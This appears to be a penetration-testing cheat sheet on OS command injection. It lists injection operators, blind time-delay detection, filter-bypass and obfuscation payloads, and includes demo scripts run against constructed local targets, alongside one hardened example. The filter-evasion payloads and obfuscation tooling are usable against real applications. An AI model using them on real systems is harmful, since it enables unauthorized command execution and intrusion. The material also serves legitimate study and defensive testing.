Command Injection

Occurs when improperly sanitized user input is concatenated into a command string that the application hands to the operating system, usually through a shell. It allows the attacker to execute arbitrary commands on the host with the privileges of the vulnerable application.

Types: In-Band (the injected command's output is returned in the response) and Blind (nothing is returned; detect it through time delays or out-of-band interactions).

Tools

Tool                   Details
Obfuscation Linux      bashfuscator -l (list available mutators)
                       bashfuscator -c "<COMMAND>" -s 1 -t 1 --no-mangling --layers 1
Obfuscation Windows    Import-Module .\Invoke-DOSfuscation.psd1
                       Invoke-DOSfuscation > SET COMMAND <COMMAND> > encoding > 1

Injection Operators

Operator      Character   URL-Encoded   Executed Command
Semicolon     ;           %3b           Both
New Line      \n          %0a           Both
Background    &           %26           Both (second output generally shown first)
Pipe          |           %7c           Both (only second output is shown)
AND           &&          %26%26        Both (only if first succeeds)
OR            ||          %7c%7c        Second (only if first fails)
Sub-Shell     ``          %60%60        Both (Linux-only)
Sub-Shell     $()         %24%28%29     Both (Linux-only)

Note: cmd.exe does not treat ; as a command separator (PowerShell does); &, |, && and || work in both Windows shells and on Linux.
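The table above can be checked against a small constructed target. This is an added example, not code from the original page: a lookup helper that builds its command by string interpolation and hands it to sh -c, next to the hardened form that passes the value as a separate argument. The helper names and the INJECTED marker are constructed for the demo.

```shell
#!/bin/sh
# Added example: vulnerable vs. hardened command construction, and a probe
# that tries each injection operator from the table against the vulnerable one.

# Vulnerable: the user value is re-parsed by sh, so operators in it are honoured.
vuln_lookup() {
    sh -c "printf 'host=%s\n' $1" 2>/dev/null
}

# Hardened: no shell ever parses the value; it is a single argv element of printf.
safe_lookup() {
    printf 'host=%s\n' "$1"
}

# A literal newline, for the New Line operator (%0a on the wire).
nl=$(printf '\nx'); nl=${nl%x}

# Inject "<operator> echo INJECTED" through the vulnerable helper and report
# whether the marker appeared in the output (1) or not (0).
probe() {
    probe_out=$(vuln_lookup "x$1 echo INJECTED")
    case "$probe_out" in *INJECTED*) echo 1 ;; *) echo 0 ;; esac
}

# Sub-shell operators do not chain a second command; their output is
# substituted into the argument itself, giving host=xINJECTED.
probe_subshell() {
    sub_out=$(vuln_lookup 'x$(echo INJECTED)')
    case "$sub_out" in *INJECTED*) echo 1 ;; *) echo 0 ;; esac
}

# Walk the operator table. Expect 1 for every operator except ||, because the
# legitimate printf succeeds and so the right-hand side of || never runs.
for op in ';' "$nl" '&' '|' '&&' '||'; do
    printf 'operator [%s] marker seen: %s\n' "$op" "$(probe "$op")"
done
printf 'operator [$()] marker seen: %s\n' "$(probe_subshell)"

# The hardened helper prints the payload back verbatim instead of running it.
safe_lookup 'x; echo INJECTED'
```

Swapping the payload for `x|| echo INJECTED` after breaking the first command (for example with an invalid argument) flips the OR result, which is the trick to remember when only || survives a filter.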

Useful Commands

Purpose of command       Linux                 Windows
Name of current user     whoami                whoami
Operating system         uname -a              ver
Network configuration    ifconfig (or ip a)    ipconfig /all
Network connections      netstat -an           netstat -an
Running processes        ps -ef                tasklist

Blind

... && sleep 10                  # unix only
... && ping -c 10 127.0.0.1      # unix (about 9 seconds)
... && ping -n 10 127.0.0.1      # windows uses -n, not -c

Measure the response time against a request without the payload. Do not append a trailing & to the sleep: backgrounding it returns immediately and the delay is never observed. If the original command may fail, chain with ; or | instead of &&.
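Time-based detection, as an added example that is not part of the original page. The "application" is a constructed sink that runs the interpolated command but discards all output, which is what a blind injection point looks like from outside; the function names are made up for the demo.

```shell
#!/bin/sh
# Added example: detect blind command injection by response time.

# Constructed blind sink: the payload is interpolated into a shell command and
# every byte of output is thrown away, so only timing leaks information.
blind_sink() {
    sh -c "true $1" >/dev/null 2>&1
}

# Whole seconds taken to run the sink with a given suffix (1-second clock).
elapsed() {
    start=$(date +%s)
    blind_sink "$1"
    end=$(date +%s)
    echo $((end - start))
}

# 1 when the payload takes at least (delay - 1) seconds longer than a harmless
# baseline value (the clock only has 1-second resolution), else 0.
delayed() {
    base=$(elapsed 'x')
    got=$(elapsed "$1")
    if [ $((got - base)) -ge $(($2 - 1)) ]; then echo 1; else echo 0; fi
}

echo "'; sleep 2'   -> delayed: $(delayed '; sleep 2' 2)"
echo "'&& sleep 2'  -> delayed: $(delayed '&& sleep 2' 2)"
# A backgrounded sleep returns immediately, so the delay is lost: this is why
# a trailing & in the payload defeats the timing check.
echo "'; sleep 2 &' -> delayed: $(delayed '; sleep 2 &' 2)"
echo "'x' (benign)  -> delayed: $(delayed 'x' 2)"
```

Against a real target, repeat the measurement with two different delays (for example 5 and 10 seconds) so that network jitter cannot be mistaken for injection.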

Bypassing Filters

Space
  TAB                     %09
  IFS                     $IFS  ${IFS}   (expands to whitespace, so ls${IFS}-la runs as ls -la)
  Bash Brace Expansion    {ls,-la}       (commas become argument separators)

Characters in Variables
  Linux Environment Variables   printenv (list variables); ${<VARIABLE>:<START>:<LENGTH>}
                                ${PATH:0:1} or ${LS_COLORS:10:1}   (usually / and ;)
  Windows CMD                   set (list variables); %<VARIABLE>:~<START>,<LENGTH>%
                                %HOMEPATH:~0,1% (\) or %HOMEPATH:~6,-11% (depends on the path length; check with set first)
  Windows PowerShell            Get-ChildItem env: (aliases gci, ls, dir); $env:<VARIABLE>[<INDEX>]  $env:<VARIABLE>.Substring(<START>, <LENGTH>)
                                $env:HOMEPATH[0] or $env:HOMEPATH.Substring(0, 1)   (\)

Shift Characters
  Shift 1 →   man ascii: for each wanted character, take the character that precedes it in the ASCII table (X), then $(tr '!-}' '"-~'<<<X) shifts every character up by one
              e.g. whoami is written as vgn`lh (a is preceded by `), so $(tr '!-}' '"-~'<<<'vgn`lh') runs whoami

Obfuscation

'' and "" in command name    w'h'oa'm'i   w"h"oa"m"i          (quotes must be balanced)
\ and $@ in command name     w\ho\a\mi    wh$@oami            (Linux only)
$() in command name          wh$()oami    wh$(random)oami     (Linux only; the substitution expands to nothing)
Case manipulation            ${VAR,,} lowercases the variable, ${VAR^^} uppercases it (bash 4+)
                             $(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
                             $(a="WhOaMi";printf %s "${a,,}")   (in /bin/bash)
                             $(a="WhOaMi";echo ${a,,})
Inverse                      echo 'whoami' | rev   (produce the reversed string)     $(rev<<<'imaohw')
Encoding                     echo -n '<COMMAND>' | base64   (produce BASE64)         bash<<<$(base64 -d<<<BASE64)

Note: the commands above can be written in many other ways depending on which characters are filtered; try alternatives (e.g. | instead of <<<, or sh instead of bash for command execution).

# EXAMPLE: one pipeline rewritten step by step to avoid |, spaces (%09), the plain command names ($@), slashes (${PATH:0:1}) and finally a URL-encoded @ (%40)
find /usr/share/ | grep root | grep mysql | tail -n 1
tail -n 1 <<< $(grep mysql <<< $(grep root <<< $(find /usr/share/)))
tail -n 1 <<<$(grep mysql <<<$(grep root <<<$(find /usr/share/)))
tail%09-n%091%09<<<$(grep%09mysql%09<<<$(grep%09root%09<<<$(find%09/usr/share/)))
ta$@il%09-n%091%09<<<$(gr$@ep%09mysql%09<<<$(gr$@ep%09root%09<<<$(fin$@d%09/usr/share/)))
ta$@il%09-n%091%09<<<$(gr$@ep%09mysql%09<<<$(gr$@ep%09root%09<<<$(fin$@d%09${PATH:0:1}usr${PATH:0:1}share${PATH:0:1})))
ta$%40il%09-n%091%09<<<$(gr$%40ep%09mysql%09<<<$(gr$%40ep%09root%09<<<$(fin$%40d%09${PATH:0:1}usr${PATH:0:1}share${PATH:0:1})))
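The filter-bypass and obfuscation tricks above, exercised together against a constructed denylist of the kind a naive filter applies. This is an added example and not code from the original page: the denylist, the `filter` and `evaluate` helpers and the P_* payload names are all made up for the demo, and it assumes PATH starts with / and that GNU tr and base64 are available.

```shell
#!/bin/sh
# Added example: payloads that pass a naive denylist and still run the
# intended command once the sink evaluates them with bash.

# Constructed denylist: whitespace, /, ;, &, | and the literal word "whoami".
# Backticks, $, braces and quotes are not filtered, which is what the payloads
# below lean on.
deny='[[:space:]/;&|]|whoami'

filter() {
    if printf '%s' "$1" | grep -Eq "$deny"; then echo blocked; else echo allowed; fi
}

# The injection point: whatever passed the filter is evaluated by bash.
evaluate() {
    bash -c "$1" 2>/dev/null
}

# ls -d /tmp without spaces or slashes: ${IFS} as separator, ${PATH:0:1} as /.
P_IFS='ls${IFS}-d${IFS}${PATH:0:1}tmp'
# The same command through brace expansion (commas become argument separators).
P_BRACE='{ls,-d,${PATH:0:1}tmp}'
# whoami rebuilt at runtime by lowercasing a mixed-case string.
P_CASE='$(tr${IFS}"[A-Z]"${IFS}"[a-z]"<<<WhOaMi)'
# whoami rebuilt by shifting each character of "vgn`lh" up by one (man ascii).
P_SHIFT='$(tr${IFS}"!-}"${IFS}"\"-~"<<<"vgn\`lh")'
# whoami rebuilt from base64 (echo -n whoami | base64 prints d2hvYW1p).
P_B64='$(base64${IFS}-d<<<d2hvYW1p)'

# The plain forms are blocked; every obfuscated form is allowed.
for p in 'ls -d /tmp' 'whoami' "$P_IFS" "$P_BRACE" "$P_CASE" "$P_SHIFT" "$P_B64"; do
    printf '%-8s %s\n' "$(filter "$p")" "$p"
done

# And the allowed forms still run the original commands.
printf 'P_IFS   -> %s\n' "$(evaluate "$P_IFS")"
printf 'P_BRACE -> %s\n' "$(evaluate "$P_BRACE")"
printf 'P_CASE  -> %s\n' "$(evaluate "$P_CASE")"
printf 'P_SHIFT -> %s\n' "$(evaluate "$P_SHIFT")"
printf 'P_B64   -> %s\n' "$(evaluate "$P_B64")"
```

The payloads are kept in single quotes so that nothing expands before they reach the sink; on the wire they would additionally be URL-encoded (%09 for TAB, %40 for @, and so on) as in the example above.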
